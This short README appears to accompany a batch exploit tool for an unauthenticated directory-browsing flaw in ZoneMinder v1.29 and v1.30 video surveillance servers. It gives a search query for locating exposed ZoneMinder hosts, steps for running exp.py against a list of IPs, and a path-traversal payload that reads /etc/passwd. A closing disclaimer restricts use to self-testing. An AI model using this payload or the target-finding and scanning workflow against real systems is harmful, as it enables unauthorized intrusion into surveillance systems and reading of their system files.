
Zoneminder 未授权访问批量检测工具:ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。
ZoneMinder is an open-source video surveillance system. When abnormal events occur, you can receive email or SMS notifications. There is an information disclosure and authentication bypass vulnerability in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, allowing remote unauthenticated attackers to browse all directories under the web root.
app="ZoneMinder"
1. Put the IP addresses to be tested into ip.txt file
2. Run python3 exp.py
/?view=file&path=/../../../../../etc/passwd
This tool is provided only for security testers to conduct self-assessments. The author is not responsible for any consequences caused by misuse. Users must comply with local laws. This program is not for commercial use and is limited to learning and exchange.
